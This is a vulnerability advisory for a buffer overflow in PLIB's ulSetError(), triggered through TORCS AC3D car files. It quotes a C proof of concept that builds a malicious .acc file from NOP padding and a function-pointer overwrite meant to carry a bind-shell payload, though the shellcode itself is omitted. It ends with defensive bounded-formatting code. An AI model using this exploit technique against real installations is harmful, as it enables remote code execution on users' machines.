Release date: 2011-12-21
Updated on: 2011-12-22
Affected Systems:
PLIB 1.8.5
TORCS 1.3.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51152
PLIB is a portable game library.
PLIB has a remote buffer overflow vulnerability in the implementation of the ulSetError() function (src/util/ulError.cxx). Attackers can exploit this vulnerability to execute arbitrary code.
<* Source: Andrés Gómez
Link: http://secunia.com/advisories/47297/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users act at their own risk!
Andrés Gómez provides the following test method:
http://downloads.securityfocus.com/vulnerabilities/exploits/51152.c
/* Exploit Title: TORCS acc Buffer Overflow
# Date: 20/12/2011
# Author: Andres Gomez
# Software Link: http://torcs.sourceforge.net/
# Version: torcs 1.3.1
# Tested on: Windows
# CVE : */
/*
This exploit generates a specially crafted acc file
which has to be saved in the directories where
TORCS loads its data, for example replace
cars/car4-trb1/car4-trb1.acc and put test.acc or create
a new car/track and select it in the TORCS menu
*/
#include <stdio.h>
#include <stdlib.h>
/*
Shellcode: windows/shell_bind_tcp LPORT=4444 -b '\x00\xff\x0a'
Encoder: x86/shikata_ga_nai
*/
unsigned char buf[] = "";   /* shellcode bytes not reproduced here */
// This points to your shellcode
unsigned char function_pointer[] = "\xA8\xCA\x0E\x10";

int main(int argc, char **argv) {
    FILE *save_fd;
    int i = 0;

    save_fd = fopen("test.acc", "w");
    if (save_fd == NULL) {
        printf("Failed to open '%s' for writing", "test.acc");
        return -1;
    }

    /* AC3D header, then a MATERIAL whose quoted name is far longer than the loader expects */
    fprintf(save_fd, "AC3Db\n");
    fprintf(save_fd, "MATERIAL \"");
    for (i = 0; i < 607; i++) {
        putc('\x90', save_fd);
    }
    /* padding is followed by buf and then function_pointer, so both %s are needed */
    fprintf(save_fd, "%s%s\" rgb 0.4 0.4 0.4 amb 0.8 0.8 0.8 emis 0.4 0.4 0.4 spec 0.5 0.5 0.5 shi 50 trans 0\n", buf, function_pointer);
    fprintf(save_fd, "OBJECT world\n");
    fprintf(save_fd, "kids %d\n", 5);
    fclose(save_fd);
    return 0;
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PLIB
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
http://plib.sourceforge.net/
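Until a vendor fix is available, the two controls a maintainer would apply are a bounded formatter in place of the unbounded one in ulSetError() and a length check on quoted MATERIAL names before the AC3D loader hands them to any error path. The following is an added example written for this page, not PLIB or TORCS code; the 1024-byte buffer size, the 255-byte name limit and the function names are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed: a fixed-size message buffer like the one ulSetError() formats into,
 * and an assumed policy limit for a quoted MATERIAL name (not an AC3D rule). */
#define UL_ERROR_BUFFER_SIZE 1024
#define AC3D_MAX_MATERIAL_NAME 255
static char ul_error_buffer[UL_ERROR_BUFFER_SIZE];

/* Bounded replacement for the vsprintf() pattern: the message is truncated
 * to fit the buffer instead of overrunning it. Returns 1 if truncated. */
int ul_set_error_bounded(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(ul_error_buffer, sizeof ul_error_buffer, fmt, ap);
    va_end(ap);
    return n < 0 || (size_t)n >= sizeof ul_error_buffer;
}

const char *ul_last_error(void) { return ul_error_buffer; }

/* Formats `len` bytes of 'A' (a constructed oversized name) through the
 * bounded formatter; returns 1 if the message had to be truncated. */
int ul_demo_long_message(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL) return -1;
    memset(s, 'A', len);
    s[len] = '\0';
    int truncated = ul_set_error_bounded("material '%s' error", s);
    free(s);
    return truncated;
}

/* Length of the quoted name on a "MATERIAL \"...\"" line, or -1 if the line
 * is not a MATERIAL line or the closing quote is missing. A loader can reject
 * names longer than AC3D_MAX_MATERIAL_NAME before they reach any formatter. */
int ac3d_material_name_length(const char *line)
{
    const char *p = strstr(line, "MATERIAL");
    if (p == NULL) return -1;
    p = strchr(p, '"');
    if (p == NULL) return -1;
    const char *q = strchr(p + 1, '"');
    if (q == NULL) return -1;
    return (int)(q - p - 1);
}
```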